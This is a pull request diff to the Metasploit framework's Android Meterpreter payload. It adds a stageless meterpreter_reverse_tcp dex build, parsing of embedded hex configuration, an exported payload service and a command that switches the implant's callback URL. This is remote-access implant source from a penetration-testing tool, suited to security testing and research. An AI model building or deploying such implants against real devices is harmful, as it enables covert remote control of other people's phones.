### PR TITLE
add android stageless payload

### DIFF
--- a/java/androidpayload/app/src/main/AndroidManifest.xml
+++ b/java/androidpayload/app/src/main/AndroidManifest.xml
@@ -58,7 +58,7 @@
             </intent-filter>
         </receiver>
 
-        <service android:name=".MainService"/>
+        <service android:name=".MainService" android:exported="true" />
     </application>
 
 </manifest>

--- a/java/androidpayload/library/pom.xml
+++ b/java/androidpayload/library/pom.xml
@@ -145,6 +145,19 @@
 											<arg value="${com.metasploit:Metasploit-Java-Meterpreter-stdapi:jar}" />
 											<arg value="${com.metasploit:Metasploit-JavaPayload:jar}" />
 										</exec>
+
+										<echo>Building stageless meterpreter</echo>
+										<exec executable="${android.sdk.path}/platforms/android-3/tools/${dx.filename}" failonerror="true">
+											<arg value="--verbose" />
+											<arg value="--dex" />
+											<arg value="--output=${project.basedir}/../../${deploy.path}/data/android/meterpreter.dex" />
+											<arg value="${project.basedir}/../app/target/classes" />
+											<arg value="${project.basedir}/target/dx/meterpreter" />
+											<arg value="${com.metasploit:Metasploit-Java-Meterpreter:jar}" />
+											<arg value="${com.metasploit:Metasploit-Java-Meterpreter-stdapi:jar}" />
+											<arg value="${com.metasploit:Metasploit-JavaPayload:jar}" />
+										</exec>
+
 									</target>
 								</configuration>
 							</execution>

--- a/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
+++ b/java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
@@ -125,6 +125,16 @@ public class AndroidMeterpreter extends Meterpreter {
         } catch (Exception e) {
             e.printStackTrace();
         }
+        if (parameters.length > 1 && parameters[1].charAt(0) != ' ') {
+            byte[] configBytes = Utils.hexStringToByteArray(parameters[1]);
+            loadConfiguration(in, rawOut, configBytes);
+        } else {
+            int configLen = in.readInt();
+            byte[] configBytes = new byte[configLen];
+            in.readFully(configBytes);
+            loadConfiguration(in, rawOut, configBytes);
+            this.ignoreBlocks = in.readInt();
+        }
 
         this.intervalCollectionManager = new IntervalCollectionManager(getContext());
         this.intervalCollectionManager.start();

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java
@@ -43,12 +43,12 @@ public class Meterpreter {
 
 
     private final TransportList transports = new TransportList();
-    private int ignoreBlocks = 0;
+    protected int ignoreBlocks = 0;
     private byte[] uuid;
     private long sessionExpiry;
 
 
-    private void loadConfiguration(DataInputStream in, OutputStream rawOut, byte[] configuration) throws MalformedURLException {
+    protected void loadConfiguration(DataInputStream in, OutputStream rawOut, byte[] configuration) throws MalformedURLException {
         // socket handle is 4 bytes, followed by exit func, both of
         // which we ignore.
         int csr = 8;
@@ -159,20 +159,6 @@ public class Meterpreter {
      * @throws Exception
      */
     public Meterpreter(DataInputStream in, OutputStream rawOut, boolean loadExtensions, boolean redirectErrors, boolean beginExecution) throws Exception {
-
-        int configLen = in.readInt();
-        byte[] configBytes = new byte[configLen];
-        in.readFully(configBytes);
-
-        loadConfiguration(in, rawOut, configBytes);
-
-        // after the configuration block is a 32 bit integer that tells us
-        // how many stages were wired into the payload. We need to stash this
-        // because in the case of TCP comms, we need to skip this number of
-        // blocks down the track when we reconnect. We have to store this in
-        // the meterpreter class instead of the TCP comms class though
-        this.ignoreBlocks = in.readInt();
-
         this.loadExtensions = loadExtensions;
         this.commandManager = new CommandManager();
         this.channels.add(null); // main communication channel?
@@ -183,7 +169,21 @@ public class Meterpreter {
             errBuffer = null;
             err = System.err;
         }
+
         if (beginExecution) {
+
+            int configLen = in.readInt();
+            byte[] configBytes = new byte[configLen];
+            in.readFully(configBytes);
+            loadConfiguration(in, rawOut, configBytes);
+
+            // after the configuration block is a 32 bit integer that tells us
+            // how many stages were wired into the payload. We need to stash this
+            // because in the case of TCP comms, we need to skip this number of
+            // blocks down the track when we reconnect. We have to store this in
+            // the meterpreter class instead of the TCP comms class though
+            this.ignoreBlocks = in.readInt();
+
             startExecuting();
         }
     }

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVPacket.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVPacket.java
@@ -270,7 +270,7 @@ public class TLVPacket {
     public TLVPacket createResponse() throws IOException {
         TLVPacket response = new TLVPacket();
         response.add(TLVType.TLV_TYPE_METHOD, this.getStringValue(TLVType.TLV_TYPE_METHOD));
-        response.add(TLVType.TLV_TYPE_REQUEST_ID, this.getStringValue(TLVType.TLV_TYPE_REQUEST_ID));
+        response.add(TLVType.TLV_TYPE_REQUEST_ID, this.getStringValue(TLVType.TLV_TYPE_REQUEST_ID, null));
         return response;
     }
 

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TcpTransport.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TcpTransport.java
@@ -199,6 +199,8 @@ public class TcpTransport extends Transport {
             this.inputStream.readFully(throwAway);
         }
         // and finally discard the block count
-        this.inputStream.readInt();
+        if (blocks > 0) {
+            this.inputStream.readInt();
+        }
     }
 }

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Utils.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Utils.java
@@ -38,4 +38,26 @@ public class Utils {
 
         return "unknown";
     }
+
+
+    public static String bytesToHex(byte bytes[]) {
+        char[] hexDigits = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'};
+        StringBuilder buf = new StringBuilder(bytes.length * 2);
+        for (byte aByte : bytes) {
+            buf.append(hexDigits[(aByte & 0xf0) >> 4]);
+            buf.append(hexDigits[aByte & 0x0f]);
+        }
+        return buf.toString();
+    }
+
+    public static byte[] hexStringToByteArray(String s) {
+        int len = s.length();
+        byte[] data = new byte[len / 2];
+        for (int i = 0; i < len; i += 2) {
+            data[i / 2] = (byte) ((Character.digit(s.charAt(i), 16) << 4)
+                    + Character.digit(s.charAt(i+1), 16));
+        }
+        return data;
+    }
+
 }

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Utils.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Utils.java
@@ -9,6 +9,11 @@ import java.net.UnknownHostException;
 
 public class Utils {
 
+    public static void log(String log) {
+        StackTraceElement stack = new Throwable().getStackTrace()[1];
+        System.err.println("" + stack.getFileName() + ":" + stack.getLineNumber() + "=" + log);
+    }
+
     public static String runCommand(String command) throws IOException {
         Process process = Runtime.getRuntime().exec(command);
         BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()));

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/Loader.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/Loader.java
@@ -21,6 +21,7 @@ public class Loader implements ExtensionLoader {
         mgr.registerCommand("core_loadlib", core_loadlib.class);
         mgr.registerCommand("core_uuid", core_uuid.class);
         mgr.registerCommand("core_machine_id", core_machine_id.class);
+        mgr.registerCommand("core_patch_url", core_patch_url.class);
         mgr.registerCommand("core_shutdown", core_shutdown.class);
         mgr.registerCommand("core_transport_set_timeouts", core_transport_set_timeouts.class);
         mgr.registerCommand("core_transport_list", core_transport_list.class);

--- a/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_patch_url.java
+++ b/java/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_patch_url.java
@@ -1,0 +1,18 @@
+package com.metasploit.meterpreter.core;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.command.Command;
+
+public class core_patch_url implements Command {
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        String patchUrl = request.getStringValue(TLVType.TLV_TYPE_TRANS_URL);
+        if (meterpreter.getTransports().current().switchUri(patchUrl)) {
+            return EXIT_DISPATCH;
+        } else {
+            return ERROR_FAILURE;
+        }
+    }
+}


### PR DESCRIPTION
This pr adds a new stageless dex file (data/android/meterpreter.dex) containing the meterpreter_reverse_tcp payload and it's configuration.

Required for https://github.com/rapid7/metasploit-framework/pull/7292
